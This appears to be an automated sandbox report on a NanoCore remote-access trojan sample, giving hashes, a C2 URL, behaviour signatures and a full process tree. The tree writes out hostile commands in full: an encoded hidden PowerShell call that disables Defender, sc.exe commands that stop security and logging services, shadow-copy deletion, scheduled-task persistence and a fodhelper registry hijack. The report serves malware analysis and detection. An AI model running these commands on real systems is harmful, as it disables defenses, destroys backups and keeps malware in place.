Analysis
- max time kernel
150s - platform
windows11-ltsc_2024_x64 - resource
win11ltsc2024-20260911-en - resource tags
arch:x64arch:x86image:win11ltsc2024-20260911-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows - submitted
16/09/2026, 07:38
Behavioral task
behavioral1
Sample
socolivex.io_nano.exe
Resource
win10v2004-20260911-en
Behavioral task
behavioral2
Sample
socolivex.io_nano.exe
Resource
win11ltsc2024-20260911-en
General
- Target socolivex.io_nano.exe
- Size 64KB
- Sample260916-jgpg8avvay
- SHA256 c8a6150008a8aa7e47409d3b08d115c28fb941a341d5997674b7002f9bebed81
- MD5 2c4d87bce1a95eef060263a8f7d88d24
- SHA1 f31d346591b2437183cec4536ae1eb5adf1638eb
- SHA512 be89bb1dcd469e02e6f3fa3b26f5b95b0f7afc1ee3fb4d14f9ac8d76d1d1cfed7f0b510ed536765a4113bdcbc495e946c4414e74a10bf821115fd2c81a72b1e3
- SSDEEP 1536:jOO8rRWzXCDMYDPzZUF9Utm/9UOpuoA2WCc3Vnweuagn5:tdSDMYDPlUF9UW9UOphA2WCc3Vweur5
- TLSH T1BE53D78477ED8621E5FE4EFE8D3195114770F8679C23D78E0A84448E1AB2784CEE8B27
- MD5 SHA1 SHA512 SSDEEP TLSH
Malware Config
Extracted
-
nanocore
-
1.2.2.0
-
http://socolivex.io
-
ac7e2f05-8df7-4c55-8841-78385f6bb064
-
c2_url
http://socolivex.io
-
version
1.2.2.0
Signatures
- Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/3392-1-0x0000000000BC0000-0x0000000000BD6000-memory.dmp disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" socolivex.io_nano.exe - Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
- Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
- Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1084 powershell.exe - Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" socolivex.io_nano.exe - Disables Task Manager via registry modification
- Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts socolivex.io_nano.exe - Event Triggered Execution: Image File Execution Options Injection 1 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe socolivex.io_nano.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe socolivex.io_nano.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe socolivex.io_nano.exe - Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3696 netsh.exe - Creates a file in the Startup directory 1 TTPs 2 IoCs
A file was written to a Windows startup folder. Files in these directories are executed automatically when a user logs on or an application initializes.
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SysUpdate.exe socolivex.io_nano.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.bat socolivex.io_nano.exe - Disables service(s) 3 TTPs
- Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
- Stops running service(s) 4 TTPs
- Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Malware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe Set value (str) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe - Creates a new local user account 1 TTPs 2 IoCs
Uses net.exe to create a new local user account, often for persistence or a backdoor account.
pid Process 2260 net.exe 2652 net1.exe - Discovers running processes 1 TTPs 1 IoCs
Running process information can be used to identify security tools or plan follow-on actions.
pid Process 1332 tasklist.exe - Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\svchost.exe socolivex.io_nano.exe File created C:\Windows\system32\sysupdate.exe socolivex.io_nano.exe File opened for modification C:\Windows\system32\sysupdate.exe socolivex.io_nano.exe File opened for modification C:\Windows\system32\kernel32.dll socolivex.io_nano.exe File opened for modification C:\Windows\system32\ntdll.dll socolivex.io_nano.exe File opened for modification C:\Windows\system32\user32.dll socolivex.io_nano.exe - Executes a VBScript file via the Windows Script Host. 1 TTPs 1 IoCs
pid Process 5448 wscript.exe - Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\SysUpdate\\wall.bmp" socolivex.io_nano.exe Set value (str) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" socolivex.io_nano.exe - Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3392 socolivex.io_nano.exe - Launches sc.exe 28 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1724 sc.exe 2672 sc.exe 920 sc.exe 5976 sc.exe 2280 sc.exe 1344 sc.exe 4628 sc.exe 4268 sc.exe 5348 sc.exe 904 sc.exe 5080 sc.exe 4648 sc.exe 4968 sc.exe 1580 sc.exe 5076 sc.exe 5972 sc.exe 4204 sc.exe 4984 sc.exe 3696 sc.exe 548 sc.exe 876 sc.exe 2448 sc.exe 3016 sc.exe 5476 sc.exe 2432 sc.exe 120 sc.exe 2264 sc.exe 4408 sc.exe - Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe - Executes a command shell one-liner 1 TTPs 6 IoCs
Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.
pid Process 2080 cmd.exe 2032 cmd.exe 3160 cmd.exe 1976 cmd.exe 5032 cmd.exe 2404 cmd.exe - Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
- System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3800 netsh.exe - Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 5928 ipconfig.exe 1128 NETSTAT.EXE - Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2920 systeminfo.exe - Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5900 vssadmin.exe 2184 vssadmin.exe - Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000\Control Panel\Desktop\WallpaperStyle = "2" socolivex.io_nano.exe - Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell\open\command socolivex.io_nano.exe Set value (str) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell\open\command\DelegateExecute socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFBotnet\shell\open socolivex.io_nano.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFBotnet\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe\" \"%1\"" socolivex.io_nano.exe Key deleted \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell\open socolivex.io_nano.exe Key deleted \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell socolivex.io_nano.exe Key created \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings socolivex.io_nano.exe Key created \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell socolivex.io_nano.exe Key deleted \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell\open\command socolivex.io_nano.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "PDFBotnet" socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFBotnet socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFBotnet\shell socolivex.io_nano.exe Key deleted \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings socolivex.io_nano.exe Key created \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell\open socolivex.io_nano.exe Set value (str) \REGISTRY\USER\S-1-5-21-696679853-3915825385-3233721679-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\socolivex.io_nano.exe" socolivex.io_nano.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFBotnet\shell\open\command socolivex.io_nano.exe - Runs net.exe
- Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5004 schtasks.exe 8 schtasks.exe 5776 schtasks.exe - Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1084 powershell.exe 1084 powershell.exe 3376 WMIC.exe 3376 WMIC.exe 3376 WMIC.exe 3376 WMIC.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 4228 WMIC.exe 4228 WMIC.exe 4228 WMIC.exe 4228 WMIC.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe 3392 socolivex.io_nano.exe - Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3392 socolivex.io_nano.exe - Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1084 powershell.exe Token: SeIncreaseQuotaPrivilege 1084 powershell.exe Token: SeSecurityPrivilege 1084 powershell.exe Token: SeTakeOwnershipPrivilege 1084 powershell.exe Token: SeLoadDriverPrivilege 1084 powershell.exe Token: SeSystemProfilePrivilege 1084 powershell.exe Token: SeSystemtimePrivilege 1084 powershell.exe Token: SeProfSingleProcessPrivilege 1084 powershell.exe Token: SeIncBasePriorityPrivilege 1084 powershell.exe Token: SeCreatePagefilePrivilege 1084 powershell.exe Token: SeBackupPrivilege 1084 powershell.exe Token: SeRestorePrivilege 1084 powershell.exe Token: SeShutdownPrivilege 1084 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeSystemEnvironmentPrivilege 1084 powershell.exe Token: SeRemoteShutdownPrivilege 1084 powershell.exe Token: SeUndockPrivilege 1084 powershell.exe Token: SeManageVolumePrivilege 1084 powershell.exe Token: 33 1084 powershell.exe Token: 34 1084 powershell.exe Token: 35 1084 powershell.exe Token: 36 1084 powershell.exe Token: SeIncreaseQuotaPrivilege 3376 WMIC.exe Token: SeSecurityPrivilege 3376 WMIC.exe Token: SeTakeOwnershipPrivilege 3376 WMIC.exe Token: SeLoadDriverPrivilege 3376 WMIC.exe Token: SeSystemProfilePrivilege 3376 WMIC.exe Token: SeSystemtimePrivilege 3376 WMIC.exe Token: SeProfSingleProcessPrivilege 3376 WMIC.exe Token: SeIncBasePriorityPrivilege 3376 WMIC.exe Token: SeCreatePagefilePrivilege 3376 WMIC.exe Token: SeBackupPrivilege 3376 WMIC.exe Token: SeRestorePrivilege 3376 WMIC.exe Token: SeShutdownPrivilege 3376 WMIC.exe Token: SeDebugPrivilege 3376 WMIC.exe Token: SeSystemEnvironmentPrivilege 3376 WMIC.exe Token: SeRemoteShutdownPrivilege 3376 WMIC.exe Token: SeUndockPrivilege 3376 WMIC.exe Token: SeManageVolumePrivilege 3376 WMIC.exe Token: 33 3376 WMIC.exe Token: 34 3376 WMIC.exe Token: 35 3376 WMIC.exe Token: 36 3376 WMIC.exe Token: SeIncreaseQuotaPrivilege 3376 WMIC.exe Token: SeSecurityPrivilege 3376 WMIC.exe Token: SeTakeOwnershipPrivilege 3376 WMIC.exe Token: SeLoadDriverPrivilege 3376 WMIC.exe Token: SeSystemProfilePrivilege 3376 WMIC.exe Token: SeSystemtimePrivilege 3376 WMIC.exe Token: SeProfSingleProcessPrivilege 3376 WMIC.exe Token: SeIncBasePriorityPrivilege 3376 WMIC.exe Token: SeCreatePagefilePrivilege 3376 WMIC.exe Token: SeBackupPrivilege 3376 WMIC.exe Token: SeRestorePrivilege 3376 WMIC.exe Token: SeShutdownPrivilege 3376 WMIC.exe Token: SeDebugPrivilege 3376 WMIC.exe Token: SeSystemEnvironmentPrivilege 3376 WMIC.exe Token: SeRemoteShutdownPrivilege 3376 WMIC.exe Token: SeUndockPrivilege 3376 WMIC.exe Token: SeManageVolumePrivilege 3376 WMIC.exe Token: 33 3376 WMIC.exe Token: 34 3376 WMIC.exe Token: 35 3376 WMIC.exe Token: 36 3376 WMIC.exe - Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3392 socolivex.io_nano.exe - Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 3392 wrote to memory of 1084 3392 socolivex.io_nano.exe 87 PID 3392 wrote to memory of 2448 3392 socolivex.io_nano.exe 89 PID 3392 wrote to memory of 3016 3392 socolivex.io_nano.exe 182 PID 3392 wrote to memory of 5476 3392 socolivex.io_nano.exe 93 PID 3392 wrote to memory of 2432 3392 socolivex.io_nano.exe 180 PID 3392 wrote to memory of 5080 3392 socolivex.io_nano.exe 97 PID 3392 wrote to memory of 1724 3392 socolivex.io_nano.exe 99 PID 3392 wrote to memory of 4648 3392 socolivex.io_nano.exe 101 PID 3392 wrote to memory of 2672 3392 socolivex.io_nano.exe 103 PID 3392 wrote to memory of 920 3392 socolivex.io_nano.exe 105 PID 3392 wrote to memory of 120 3392 socolivex.io_nano.exe 107 PID 3392 wrote to memory of 2280 3392 socolivex.io_nano.exe 109 PID 3392 wrote to memory of 2264 3392 socolivex.io_nano.exe 111 PID 3392 wrote to memory of 5976 3392 socolivex.io_nano.exe 113 PID 3392 wrote to memory of 4204 3392 socolivex.io_nano.exe 115 PID 3392 wrote to memory of 5348 3392 socolivex.io_nano.exe 117 PID 3392 wrote to memory of 4984 3392 socolivex.io_nano.exe 119 PID 3392 wrote to memory of 904 3392 socolivex.io_nano.exe 121 PID 3392 wrote to memory of 3696 3392 socolivex.io_nano.exe 181 PID 3392 wrote to memory of 4968 3392 socolivex.io_nano.exe 125 PID 3392 wrote to memory of 1344 3392 socolivex.io_nano.exe 127 PID 3392 wrote to memory of 4408 3392 socolivex.io_nano.exe 129 PID 3392 wrote to memory of 4628 3392 socolivex.io_nano.exe 131 PID 3392 wrote to memory of 4268 3392 socolivex.io_nano.exe 133 PID 3392 wrote to memory of 1580 3392 socolivex.io_nano.exe 135 PID 3392 wrote to memory of 1068 3392 socolivex.io_nano.exe 137 PID 3392 wrote to memory of 5076 3392 socolivex.io_nano.exe 138 PID 3392 wrote to memory of 5972 3392 socolivex.io_nano.exe 140 PID 3392 wrote to memory of 5900 3392 socolivex.io_nano.exe 142 PID 1068 wrote to memory of 5712 1068 fodhelper.exe 143 PID 3392 wrote to memory of 3376 3392 socolivex.io_nano.exe 145 PID 3392 wrote to memory of 5776 3392 socolivex.io_nano.exe 148 PID 3392 wrote to memory of 5004 3392 socolivex.io_nano.exe 150 PID 3392 wrote to memory of 2404 3392 socolivex.io_nano.exe 157 PID 3392 wrote to memory of 2080 3392 socolivex.io_nano.exe 159 PID 3392 wrote to memory of 5032 3392 socolivex.io_nano.exe 160 PID 3392 wrote to memory of 1976 3392 socolivex.io_nano.exe 161 PID 3392 wrote to memory of 3160 3392 socolivex.io_nano.exe 162 PID 3392 wrote to memory of 2032 3392 socolivex.io_nano.exe 163 PID 3392 wrote to memory of 8 3392 socolivex.io_nano.exe 164 PID 3392 wrote to memory of 5448 3392 socolivex.io_nano.exe 171 PID 3160 wrote to memory of 5928 3160 cmd.exe 172 PID 2404 wrote to memory of 2184 2404 cmd.exe 173 PID 1976 wrote to memory of 4528 1976 cmd.exe 174 PID 5032 wrote to memory of 1332 5032 cmd.exe 175 PID 2032 wrote to memory of 1128 2032 cmd.exe 176 PID 2080 wrote to memory of 2920 2080 cmd.exe 177 PID 2404 wrote to memory of 4228 2404 cmd.exe 178 PID 3392 wrote to memory of 3864 3392 socolivex.io_nano.exe 179 PID 3392 wrote to memory of 2432 3392 socolivex.io_nano.exe 180 PID 3392 wrote to memory of 3696 3392 socolivex.io_nano.exe 181 PID 3392 wrote to memory of 548 3392 socolivex.io_nano.exe 183 PID 3392 wrote to memory of 876 3392 socolivex.io_nano.exe 184 PID 3392 wrote to memory of 5376 3392 socolivex.io_nano.exe 185 PID 3392 wrote to memory of 3800 3392 socolivex.io_nano.exe 186 PID 2432 wrote to memory of 5340 2432 net.exe 191 PID 3392 wrote to memory of 2260 3392 socolivex.io_nano.exe 192 PID 3392 wrote to memory of 3552 3392 socolivex.io_nano.exe 193 PID 3552 wrote to memory of 2984 3552 net.exe 196 PID 2260 wrote to memory of 2652 2260 net.exe 197 - Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe"C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe"1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Disables RegEdit via registry modification
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Creates a file in the Startup directory
- Adds Run key to start application
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -Exec Bypass -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwB5AHMAVQBwAGQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop wscsvc2⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config wscsvc start= disabled2⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop SecurityHealthService2⤵
- Launches sc.exe
PID:5476
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SecurityHealthService start= disabled2⤵
- Launches sc.exe
PID:2432
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop WinDefend2⤵
- Launches sc.exe
PID:5080
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config WinDefend start= disabled2⤵
- Launches sc.exe
PID:1724
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop MsMpSvc2⤵
- Launches sc.exe
PID:4648
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config MsMpSvc start= disabled2⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop wuauserv2⤵
- Launches sc.exe
PID:920
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config wuauserv start= disabled2⤵
- Launches sc.exe
PID:120
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop bits2⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config bits start= disabled2⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop vss2⤵
- Launches sc.exe
PID:5976
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config vss start= disabled2⤵
- Launches sc.exe
PID:4204
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop swprv2⤵
- Launches sc.exe
PID:5348
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config swprv start= disabled2⤵
- Launches sc.exe
PID:4984
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop EventLog2⤵
- Launches sc.exe
PID:904
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config EventLog start= disabled2⤵
- Launches sc.exe
PID:3696
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop SysmonLog2⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SysmonLog start= disabled2⤵
- Launches sc.exe
PID:1344
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop Sysmon2⤵
- Launches sc.exe
PID:4408
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config Sysmon start= disabled2⤵
- Launches sc.exe
PID:4628
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop sense2⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config sense start= disabled2⤵
- Launches sc.exe
PID:1580
-
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe"C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe"3⤵PID:5712
-
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop wscsvc2⤵
- Launches sc.exe
PID:5076
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop wuauserv2⤵
- Launches sc.exe
PID:5972
-
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5900
-
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "SysUpdateTask" /tr "C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe" /sc onlogon /f2⤵
- Scheduled Task/Job: Scheduled Task
PID:5776
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "SysUpdateBackup" /tr "C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe" /sc minute /mo 30 /f2⤵
- Scheduled Task/Job: Scheduled Task
PID:5004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\del.bat" "2⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2184
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4228
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c systeminfo > "C:\ProgramData\SysUpdate\Logs\sysinfo.txt"2⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:2920
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c tasklist > "C:\ProgramData\SysUpdate\Logs\tasklist.txt"2⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Discovers running processes
PID:1332
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c whoami > "C:\ProgramData\SysUpdate\Logs\whoami.txt"2⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\whoami.exewhoami3⤵PID:4528
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ipconfig /all > "C:\ProgramData\SysUpdate\Logs\ipconfig.txt"2⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\system32\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:5928
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c netstat -an > "C:\ProgramData\SysUpdate\Logs\netstat.txt"2⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\NETSTAT.EXEnetstat -an3⤵
- Gathers network information
PID:1128
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RansomwareCheck" /tr "C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe" /sc daily /f2⤵
- Scheduled Task/Job: Scheduled Task
